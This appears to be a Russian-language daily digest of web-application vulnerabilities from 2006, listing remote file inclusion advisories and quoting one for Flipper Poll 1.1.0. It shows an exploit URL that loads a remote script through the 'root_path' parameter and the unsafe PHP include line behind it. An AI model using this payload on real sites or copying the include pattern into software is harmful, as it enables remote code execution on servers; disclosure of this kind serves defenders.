Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

[SA21038] CzarNews "tpath" File Inclusion Vulnerability

SubberZ[Lite] - Remote File Include

perForms  <= 1.0 ([mosConfig_absol ute_path]) Remote File Inclusion

flatnuke <= 2.5.7 arbitrary php file upload

From:	x0r0n_(at)_hotmail.com <x0r0n_(at)_hotmail.com>
Date:	14 июля 2006 г.
Subject:	Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability

Flipper Poll <= 1.1.0 Remote File Inclusion Vulnerability

------------------------------------------


Discoverd By: XORON

------------------------------------------


cont@ct: x0r0n[at]hotmail[dot]com

------------------------------------------


Exploit: http://sitename.com/[path]/poll.php?root_path=evil_script?

------------------------------------------

Code: include_once($root_path . 'config.php');

------------------------------------------

# XORON - WWW.CYBER-WARRIOR.ORG -